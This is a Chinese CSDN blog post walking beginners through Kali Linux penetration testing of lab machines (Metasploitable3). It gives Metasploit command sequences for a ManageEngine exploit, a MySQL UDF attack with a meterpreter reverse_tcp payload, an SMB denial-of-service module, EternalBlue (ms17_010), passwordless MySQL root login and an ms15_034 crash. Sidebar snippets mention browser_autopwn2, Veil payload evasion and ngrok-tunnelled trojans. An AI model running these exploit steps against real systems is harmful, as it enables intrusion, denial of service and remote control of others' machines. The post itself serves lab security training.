刚入门的黑客是如何进行Kali Linux渗透测试的?

最新推荐文章于 2024-04-23 09:05:49 发布
最新推荐文章于 2024-04-23 09:05:49 发布
阅读量704 收藏 17
点赞数 1
文章标签: 网络安全 linux 系统安全 web安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llaqljcrm/article/details/128109815
版权

1、攻击windows服务器漏洞

用nmap对网段进行扫描nmap -sP 192.168. 再进行IP扫描。


发现Windows服务器漏洞
步骤:
msfconsole—进入渗透模块


search manageengine-------搜索渗透模块

search reverse_http---------搜索http渗透模块


use
exploit/windows/http/manageeine_connectionid_write--------使用该渗透模块


set rhosts 192.168.


set rport 8022


set LpORT 8080


run -----------------设置攻击目标地址,攻击目标端口,回连的端口号:

2、MYSQL数据库漏洞

nmap 192.168.-----扫描端口漏洞


步骤:
msfconsole-------进入渗透模式


search mysql-------扫描数据库渗透版本


use
exploit/multi/mysql/mysql_udf_payload----------使用该渗透版本进行渗透


show options


set rhosts 192.168.--------设置攻击端口号

set payload
windows/x64/meterpreter/reverse_tcp--------选择该渗透方式进行攻击


run

3、拒绝服务攻击漏洞:

使用nmap 192.168. 对端口号进行扫描发现漏洞

步骤:

msfconsole-------进入渗透模式

search dos/smb/smb-------搜索渗透版本


use
auxiliary/dos/smb/smb_loris-------使用该渗透版本进行攻击

在这里插入图片描述

show options--------

set rhosts 192.168.--------设置攻击端口号

run-----渗透

4.永恒之蓝漏洞复现

漏洞描述:

Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。

影响版本:

目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

复现环境:

攻击机:Kali2020.3(IP:192.168.88.143)

靶机:Metasploitable3Win2k8 (IP:192.168.88.140)

复现过程:

1.用nmap执行C段扫描

2.打开MSF

在终端输入如下命令打开MSF终端:

搜索ms17_010模块

这里可以得到几个工具,其中
auxiliary/scanner/smb/smb_ms17_010是永恒之蓝扫描模块,
exploit/windows/smb/ms17_010_eternalblue是永恒之蓝攻击代码,一般配合使用,前者先扫描,若显示有漏洞,再进行攻击。

执行扫描模块


执行ms17_010攻击模块

5.MySQL弱密码登录:

1、在kali上执行mysql –h 192.168.26.123 –u root

2、登录成功,进入MySQL系统

3、测试效果:

6.http(ms15_034漏洞)

进入msf模块


查看要设置的东西show options

设置攻击ip

攻击前

攻击后,我的是蓝屏1秒后,跳转到立即重启界面

ssh测试

开启端口转发

查看情况

在kali上尝试连接(rdesktop IP)

网络安全零基础入门
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 3339
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
metasploitable3渗透测试
qq_57976347的博客
06-06 402
1、攻击windows服务器漏洞 用nmap对网段进行扫描nmap -sP 192.168. 在进行IP扫描 发现Windows服务器漏洞 步骤: msfconsole---进入渗透模块 search manageengine-------搜索渗透模块 search reverse_http---------搜索http渗透模块 use exploit/windows/http/manageeine_connectionid_write---...
KaliLinux安全渗透教程(完整版)
04-26
第 1 章 Lin u x 安 全 渗 透 简 介 1.1 什 么 是 安 全 渗 透 1.2 安 全 渗 透 所 需 的 工 具 1.3 K ali Lin u x 简 介 1.4 安 装 K ali Lin u x 1.5 K ali更 新 与 升 级 1.6 基 本 设 置 第 2 章 配 置 K ali Lin u x 2.1 准 备 内 核 头 文 件 2.2 安 装 并 配 置 N VIDIA 显 卡 驱 动 2.3 应 用 更 新 和 配 置 额 外 安 全 工 具 2.4 设 置 P r o x y C h ain s 2.5 目 录 加 密 第 3 章 高 级 测 试 实 验 室 3.1 使 用 V M w a r e W o r k s t a tio n 3.2 攻 击 W o r d P r e s s 和 其 他 应 用 程 序 第 4 章 信 息 收 集 4.1 枚 举 服 务 4.2 测 试 网 络 范 围 4.3 识 别 活 跃 的 主 机 4.4 查 看 打 开 的 端 口 4.5 系 统 指 纹 识 别 4.6 服 务 的 指 纹 识 别 4.7 其 他 信 息 收 集 手 段 4.8 使 用 M alt e g o 收 集 信 息 4.9 绘 制 网 络 结 构 图 第 5 章 漏 洞 扫 描 5.1 使 用 N e s s u s 5.2 使 用 O p e n VA S 第 6 章 漏 洞 利 用 6.1 M e t a s ploit a ble 操 作 系 统 6.2 M e t a s ploit 基 础 6.3 控 制 M e t e r p r e t e r 6.4 渗 透 攻 击 应 用 大 学 霸 K ali Lin u x 安 全 渗 透 教 程 2 6.5 7 7.1 7.2 7.3 7.4 8 8.1 8.2 8.3 8.4 8.5 8.6 8.7 8.8 8.9 9 9.1 9.2 9.3 9.4 9.5 9.6 9.7 9.8 6.5 免杀Payload生成工具Veil 第7章 权限提升 7.1 使用假冒令牌 7.2 本地权限提升 7.3 使用社会工程学工具包(SET) 7.4 使用SET实施攻击 第8章 密码攻击 8.1 密码在线破解 8.2 分析密码 8.3 破解LM Hashes密码 8.4 绕过Utilman登录 8.5 破解纯文本密码工具mimikatz 8.6 破解操作系统用户密码 8.7 创建密码字典 8.8 使用NVIDIA计算机统一设备架构(CUDA) 8.9 物理访问攻击 第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上破解无线网络 9.7 攻击路由器 9.8 Arpspoof工具
Kali与编程:SqlMap数据库渗透测试与攻防演练
06-30
一、学完本课程,您将掌握:掌握Sqlmap使用方法掌握数据库渗透技巧   二、适合人群:1.零基础大学生 2.桌面运维工程师 3.网络运维工程师 4.渗透测试工程师三、学习计划:建议每天抽出2小时学习,并结合渗透测试实验环境,进行渗透攻防演练,不断提高自己的渗透技巧。四、课程目标:掌握Sqlmap数据库渗透测试技巧五、课程简介:一、课程目标       掌握Sqlmap数据库渗透测试技巧 二、课程特点       注重基础和实战,可操作、易上手 三、你将学到       SqlMap数据库攻防演练技巧 四、适合人员        兴趣网络安全与渗透测试的学员观看六、常见问题: 疑问1: 零基础可以学会吗?本课从零开始,由浅入深,跟着操作,零基础学员也能学会。 疑问2: 英语基础弱的学员能学习吗?英语不应该成为你提高自己的拦路虎或借口,英语是一个积累的过程,碰到不会的单词可借助现成翻译工具轻松解决。学习本质上是一个发现问题解决问题,由不懂到懂、从量变到质变的过程,加油!
一文通透——Kali Linux基础入门_kali linux 新手教程
最新发布
heike_Ch的博客
04-23 976
此文章可能会包含敏感以及危险的命令❗❗❗命令有风险,回车需谨慎。此文章仅供学习交流与参考使用,禁止运用于任何非法行动或测试中,若有预期之外的后果,将不承担任何责任!!
Kali Linux渗透测试全程课与脚本语言编程系列课程
09-29
一、课程概要         本课程主要分享分享Kali Linux渗透测试全程课与脚本语言编程系列课程! 二、课程目标          本课程致力于帮助广大学员掌握Kali Linux渗透测试与编程技巧! 三、适合人员         本课程适合兴趣计算机与网络安全技术的学员观看学习! 四、特别提醒         本课程支持一次购买,享受永久观看,欢迎大家选购!
利用Kali 完成一次简单的渗透
qq_50905066的博客
03-20 3万+
这里我们需要两台虚拟机。一台Kali 作为攻击机,一台Ubuntu作为靶机。 如图: 渗透的话我们需要先得到靶机的ip 地址才能进行扫描。因为是虚拟机,只要我们知道了Kali 的ip 的地址,扫描其所在网段就可以获得靶机的地址了。 如图: 通过使用Kali自带的扫描工具执行Namp -sP 192.168.161.1/24就可以扫到了。这里我们排出太小的地址和太大的地址以及攻击的地址就可以确定靶机的地址了。 在得到靶机的地址之后,我们就可以进一步扫描靶机端口,从其中获得靶机开启的端口和..
渗透测试kali使用教程(一):常用命令和基本工具使用
热门推荐
u011871680的博客
12-03 4万+
kali教程
Kali Linux 无线渗透测试入门指南 中文版
11-21
Kali Linux 无线渗透测试入门指南》是一本专为初学者设计的中文教程,旨在帮助读者理解并掌握使用Kali Linux进行无线网络渗透测试的基本技能。Kali Linux是一款广泛应用于安全审计和渗透测试的开源操作系统,其...
kali-linux-08-06-2019.rar
06-03
kali-linux的最小集合安装包,他只包含了必要的组件,轻巧,简约。适合自定义安装。kali-linux,安全工作者和黑客的必备工具系统。如果你想成为网络安全工作者,或是想学习黑客知识。它将是你的好伙伴。
WEB渗透测试入门.rar
03-07
3. Kali Linux:集成大量渗透测试工具的操作系统,方便进行实战演练。 总之,Web渗透测试是网络安全领域的重要技能,涉及广泛的知识和实践经验。对于初学者,从基础理论开始,逐步学习并实践各种漏洞利用技巧,是...
Kali Linux Wireless Pentesting and Security for Beginners.pdf
05-01
Kali Linux无线渗透测试与安全入门》是针对初学者的一本指南,旨在教授读者如何使用Kali Linux进行无线网络安全测试Kali Linux是一个专为网络安全专业人士设计的Linux发行版,包含了各种渗透测试和安全审计工具...
Kali Linux渗透测试基础入门到进阶实战全程课
09-29
课程标题:Kali Linux渗透测试基础入门到进阶实战全程课一、课程声明       本课程所有分享仅做学习交流,切勿用于任何不法用途,请每位学员自觉遵守网络安全法等法律法规!二、课程概要       本课程主要分享Kali Linux渗透测试基础入门到进阶实战全程技巧!三、适合人员       1、零基础大学生       2、IT技术人员       3、运维工程师       4、渗透测试工程师       5、漏洞挖掘工程师四、特别说明       1、本课程支持一次购买,永久观看!       2、本课系讲师原创课程,请勿盗用!
Kali基本入门
weixin_51931592的博客
05-05 6292
Kali入门命令,这部分内容是自己去年学习的时候写的,发出来供大家参考,文章内容比较简单,大神轻喷
kali】metasploit渗透测试工具使用教程
Kris__zhang的博客
06-23 8756
metasploit概述 是一款开源的安全漏洞检测工具,它可以帮助网络安全和IT专业人士识别安全性问题,验证漏洞的解决措施,从而完成对目标的安全性评估 该工具包括了 智能开发,代码审计,web应用程序扫描和社会工程等各项功能 什么是metasploit 可以用来发现漏洞,利用漏洞,提交漏洞,并实施攻击,用户可以从其他 漏洞扫描程序导入数据,基于漏洞主机的详细信息来发现可攻击漏洞 模块按照不同用途可分为7中类型,分别是Exploits(渗透攻击模块),Auxiliary(辅助模块),Post(后渗透攻击模块
Kali Linux渗透测试技术详解_渗透测试入门
A_991128a的博客
06-05 1436
Kali Linux作为攻击端,为了以后能模拟漏洞场景,我还装了一个Debian11的虚拟机,Debian 11是官网下载的镜像文件,在Vmware中安装的时候有图文提示,一路安装正常,也设置了普通用户和root的登录密码,默认安装成功进入了图形化界面,作为专业开发我肯定想让他进入命令行模式,我在图形登录界面试了一下Ctro+Alt+F1-F6试了一下,Ctro+Alt+F3进入命令行,然后切换到root用户。为了方便用户进行渗透方面的工作,有人将所有的工具都预装在一个Linux系统,其中。
kali的新手教程
2201_76048337的博客
06-24 5705
众所周知,黑客不会玩KALI都是假黑客,那么现在我来 教大家KALI的新手教程吧!这里,我盘点了一些KALI常用的代码KALI中的ROOT权限与Windows中的管理员权限类似,进入以后,你的行为成功性会扩大打开KALI 打开终端输入: 接着,输入: 出现以下画面: 按住下键,找到“kali"选项 按”i“键进入插入模式,将参数的两个1000调成0 按Esc键退出插入模式,按shift+两个z保存退出输入reboot重启即可输入: 出现以下画面: 按住下键,找到zh_CN.UTF-8
kali linux安全渗透教程
ITSM/ITIL/网络安全/IT运维
07-08 3960
第1章 Linux安全渗透简介 渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如设计缺陷和技术缺陷。本章将简要介绍Linux安全渗透及安全渗透工具的相关内容。其主要知识点如下: 什么是安全渗透; 安全渗透所需的工具; Kali Linux简介; 安装Kali LinuxKali更新与升级; 基本设置。 1.1 什么是安全渗透 渗透测试并没有一个标准的定义。国外一些安全组织达成共识的通用说法是,渗透测试是通过模拟恶意黑客的攻击
kali渗透内网和外网
weixin_62693307的博客
04-17 6046
set payload windows/meterpreter/reverse_tcp 设置payload为才反向远程控制程序名称(windows/meterpreter/reverse_tcp)接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用。这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网。
基于树莓派Kali Linux渗透测试基础教程,网络安全,计算机,黑客教程
03-13
"基于树莓派的Kali Linux渗透测试基础教程,涵盖了树莓派的基础知识,硬件配置,系统安装,以及渗透测试的前期准备。教程适用于想利用树莓派进行安全测试的学习者,提供了详细的操作步骤和问题解决方法。" 在IT行业...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值